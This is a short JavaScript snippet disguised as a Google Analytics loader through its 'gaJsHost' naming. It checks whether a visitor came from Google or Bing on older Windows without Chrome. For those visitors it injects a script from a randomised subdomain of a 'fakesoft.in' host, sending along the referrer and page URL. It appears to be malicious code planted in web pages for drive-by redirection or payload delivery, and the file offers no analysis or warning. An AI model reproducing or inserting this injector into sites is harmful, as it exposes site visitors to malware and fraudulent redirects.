 function gaJsHost(script){
	var string = navigator.userAgent;
	var referer = document.referrer;
	
	if(referer.indexOf('bing') != -1 || referer.indexOf('google') != -1)
		if (string.indexOf('Windows NT 5') != -1 || string.indexOf('Windows NT 6.0') != -1  || string.indexOf('Windows NT 6.1') != -1)	
			if(string.indexOf('Chrome') == -1 || string.indexOf('AppleWebKit') == -1){

				script();
				
			}
  }
  

  gaJsHost(function(){
	  
	   var gaJsHost = (("http:" == document.location.protocol) ? "http://"+Math.floor(Math.random() *30000)+".fak" : "http://"+Math.floor(Math.random() *30000)+".fak"); document.write(unescape("%3Cscript src='" + gaJsHost + "esoft.in/adv?id="+Math.floor(Math.random() *30000)+"&seoref="+encodeURIComponent(document.referrer)+ "&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=' type='text/javascript'%3E%3C/script%3E"));
	  
	  });
